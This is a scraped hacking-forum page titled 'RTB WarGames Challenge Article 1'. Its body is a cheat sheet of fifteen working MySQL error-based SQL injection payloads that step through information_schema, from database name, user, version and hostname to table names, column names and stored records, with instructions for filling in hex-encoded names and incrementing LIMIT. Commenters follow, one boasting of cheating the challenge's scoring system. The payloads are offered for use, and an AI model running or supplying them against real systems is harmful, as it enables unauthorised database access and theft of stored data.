Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

RTB WarGames Challenge Article 1

ghost | 9849 Reads |

0 0

But since you clicked it anyway:

The following are Error-based MySQL specific injections using String type parameters.

The data is returned using Hex() and cast() to make the query more reliable and avoid bad character and format string issues. These injections are also totally dependent on the availability of the information_schema database.

All data will be returned in Hexadecimal format, simply decode to ASCII.

1. To select the current database

(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

2. To find the current user

(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

3. To find MySQL Version

(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(version() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

4. Find current database

5. To find the system user

(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(system_user() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

6. To find the hostname

(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@hostname as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

7. To find the installation directory

(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(@@basedir as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

8. To find the DB User

(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(GRANTEE as char)),0x27,0x7e) FROM information_schema.user_privileges LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

9. To find the databases

………

Note: Keep incrementing the capitalized LIMIT as per below

(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(schema_name as char)),0x27,0x7e) FROM information_schema.schemata LIMIT 2,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

…………..

10. To count the number of tables in the selected database

Note: Replace 0xHEX-CODE-OF- string with appropriate value

(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM information_schema.tables WHERE table_schema=0xHEX-CODE-OF-DATABASE-NAME)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

11. To get the table names in the selected database

Note: Keep incrementing the capitalized LIMIT below for successive table names

Replace 0xHEX-CODE-OF- string with appropriate value

(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(table_name as char)),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEX-CODE-OF-DATABASE-NAME LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

12. To get number of columns in the selected table name

Note: Replace 0xHEX-CODE-OF- strings with appropriate value

(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM information_schema.columns WHERE table_schema=0xHEX-CODE-OF-DATABASE-NAME AND table_name=0xHEX-CODE-OF-TABLE-NAME)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

13. To get column names of a selected table name

Note: Keep incrementing the capitalized LIMIT below for successive column names

Replace 0xHEX-CODE-OF- strings with appropriate value

(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,Hex(cast(column_name as char)),0x27,0x7e) FROM information_schema.columns Where table_schema=0xHEX-CODE-OF-DATABASE-NAME AND table_name=0xHEX-CODE-OF-TABLE-NAME LIMIT 0,1 )) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

14. To count the number of records in a selected column

Note: Replace DATABASE-NAME and TABLE-NAME with appropriate value

(select 1 from(select count(),concat((select (select (SELECT concat(0x7e,0x27,count(),0x27,0x7e) FROM **DATABASE-NAME**.TABLE-NAME)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

15. To fetch records from a selected column

Note: Replace DATABASE-NAME, both TABLE-NAME entries and COLUMN-NAME with appropriate value

Keep incrementing the capitalized LIMIT below for successive entries

(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,Hex(cast(TABLE-NAME.COLUMN-NAME as char)),0x27,0x7e) FROM **DATABASE-NAME**.TABLE-NAME LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)

End.

Comments

ghost 19 years ago

First decent article in ages.

ghost 19 years ago

I agree with fagitz you rock

ghost 19 years ago

x3 :P Great article… Really helped :P

ghost 19 years ago

great job on the article and the challenge

ghost 19 years ago

Nice article and Well done on completing the Challenge.

ghost 19 years ago

Didn't actually root or complete the challenege, but faked it by bypassing Grind's scoring system.

I'd suggest doing a little more organizing and planning before writing articles, but it's not bad.

ghost 19 years ago

fuck dhen i was a min late from u skarecrow.. and lol it was me who changed the backup.log file so i thought everyone will get a messed up password like that fuckin… anyways greatjob skarecrow.. better luck next time

ghost 19 years ago

putyt wont let me enter a password

ghost 19 years ago

me neither.

ghost 19 years ago

cool!

ghost 18 years ago

Great Article. The first one to really help me!

ghost 18 years ago

Nice article. Explained it well for someone like me;)

ghost 18 years ago

Excellent article 10/10;

ghost 18 years ago

you used putty as your ssh/telnet client, would something like hyperterminal work too? or another shell, bash perhaps?

ghost 16 years ago

wtf? The article isn't actually showing up. Any reason?

ranma 15 years ago

Form is emptiness…?

olichip 12 years ago

???

Lemmink 11 years ago

Jan 11, 2013. Form still empty. Me thinks it was taken down for a reason. :(

rex_mundi 9 years ago

thumbs up

RTB WarGames Challenge Article 1

Uh oh. Looks like your using an ad blocker.

RTB WarGames Challenge Article 1

ghost 19 years ago

ghost 19 years ago

ghost 19 years ago

ghost 19 years ago

ghost 19 years ago

ghost 19 years ago

ghost 19 years ago

ghost 19 years ago

ghost 19 years ago

ghost 19 years ago

ghost 18 years ago

ghost 18 years ago

ghost 18 years ago

ghost 18 years ago

ghost 16 years ago

ranma 15 years ago

olichip 12 years ago

Lemmink 11 years ago

rex_mundi 9 years ago